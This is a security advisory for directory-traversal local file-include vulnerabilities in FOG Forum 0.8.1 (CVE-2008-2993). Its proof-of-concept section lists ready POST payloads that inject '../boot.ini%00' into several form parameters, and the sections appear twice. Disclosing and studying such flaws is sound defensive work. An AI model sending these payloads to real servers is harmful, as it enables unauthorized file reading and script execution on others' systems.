FOG Forum Multiple Local File Include Vulnerabilities
BID:29651
Info
FOG Forum Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 29651 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2993 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 11 2008 12:00AM |
| Updated: | Apr 16 2015 05:59PM |
| Credit: | CWH Underground |
| Vulnerable: |
FOG Forum FOG Forum 0.8.1 |
| Not Vulnerable: | |
Discussion
FOG Forum Multiple Local File Include Vulnerabilities
FOG Forum is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
FOG Forum 0.8.1 is vulnerable; other versions may also be affected.
FOG Forum is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
FOG Forum 0.8.1 is vulnerable; other versions may also be affected.
Exploit / POC
FOG Forum Multiple Local File Include Vulnerabilities
Attackers can exploit these issues using a browser.
The following proof-of-concept POST request data is available:
fog_skin=default&fog_lang=../../../../../../../../boot.ini%00 fog_skin=../../../../../../../../boot.ini%00&fog_lang=francais fog_pseudo=../../../../../../../../boot.ini%00&[email protected]&fog_cook=0&fog_action=0&[email protected]&fog_path=http://localhost/forum/index.php fog_posted=../../../../../../../../boot.ini%00&[email protected]&[email protected]&fog_cook=0 fog_posted=1&fog_pseudo=../../../../../../../../boot.ini%00&[email protected]&fog_cook=0 fog_posted=1&[email protected]&fog_password=../../../../../../../../boot.ini%00&fog_cook=0 fog_posted=1&[email protected]&[email protected]&fog_cook=../../../../../../../../boot.ini%00
Attackers can exploit these issues using a browser.
The following proof-of-concept POST request data is available:
fog_skin=default&fog_lang=../../../../../../../../boot.ini%00 fog_skin=../../../../../../../../boot.ini%00&fog_lang=francais fog_pseudo=../../../../../../../../boot.ini%00&[email protected]&fog_cook=0&fog_action=0&[email protected]&fog_path=http://localhost/forum/index.php fog_posted=../../../../../../../../boot.ini%00&[email protected]&[email protected]&fog_cook=0 fog_posted=1&fog_pseudo=../../../../../../../../boot.ini%00&[email protected]&fog_cook=0 fog_posted=1&[email protected]&fog_password=../../../../../../../../boot.ini%00&fog_cook=0 fog_posted=1&[email protected]&[email protected]&fog_cook=../../../../../../../../boot.ini%00
Solution / Fix
FOG Forum Multiple Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].